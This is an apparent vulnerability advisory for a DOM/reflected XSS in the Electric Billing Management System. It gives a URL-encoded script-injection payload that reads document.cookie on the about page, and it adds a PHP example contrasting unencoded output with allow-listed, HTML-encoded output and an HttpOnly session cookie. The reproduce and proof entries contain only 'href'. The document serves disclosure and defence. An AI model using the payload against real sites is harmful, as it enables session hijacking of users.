CVE-nu11-19-302021


Description:

The Electric Billing Management System (by oretnom23) is affected by an XSS - DOM PHPSESSID hijacking vulnerability. An attacker can execute a remote payload and steal an active PHPSESSID, which can then be used for various malicious purposes.


  • Payload:
zd3ji%3c%2ftitle%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3eoyc33
  • Vulnerable app (about page):
http://192.168.1.180/electric_billing/?page=about

Reproduce:

href

Proof:

href
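
The payload above begins by closing `</title>`, which suggests the `page` value is written into the page title without output encoding. The following PHP is an added example, not code from the application or from the advisory's author; it shows that pattern beside a hardened form, and the function names, the allow-list and the reflection point are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not Electric Billing Management System code.
// Assumption: ?page= is echoed into <title>, as the payload's </title> prefix suggests.

const ALLOWED_PAGES = ['home', 'about'];   // hypothetical allow-list of page names

// Vulnerable pattern: request data concatenated into markup unencoded.
function title_vulnerable(string $page): string
{
    return '<title>' . $page . '</title>';
}

// Hardened pattern: allow-list the value, then HTML-encode on output anyway.
function title_hardened(string $page): string
{
    if (!in_array($page, ALLOWED_PAGES, true)) {
        $page = 'home';                    // unknown page: fall back, never reflect it
    }
    return '<title>'
        . htmlspecialchars($page, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        . '</title>';
}

// Defence in depth: keep PHPSESSID out of reach of document.cookie.
// Call once, before session_start() and before any output is sent.
function harden_session_cookie(bool $https): bool
{
    return session_set_cookie_params([
        'path'     => '/',
        'secure'   => $https,              // true only when the site is served over HTTPS
        'httponly' => true,                // cookie is not exposed to page scripts
        'samesite' => 'Lax',
    ]);
}

// Payload from the advisory, URL-decoded the way PHP decodes $_GET values.
$payload = urldecode('zd3ji%3c%2ftitle%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3eoyc33');

// Unencoded: the injected </title> ends the element and the <script> becomes markup.
echo title_vulnerable($payload), PHP_EOL;
// Hardened: the payload is not on the allow-list, so none of it reaches the page.
echo title_hardened($payload), PHP_EOL;
// Hardened: a legitimate page name passes through unchanged.
echo title_hardened('about'), PHP_EOL;
```

Output encoding removes the injection point; the `HttpOnly` flag limits what any remaining script injection can read, since `document.cookie` no longer returns the session identifier.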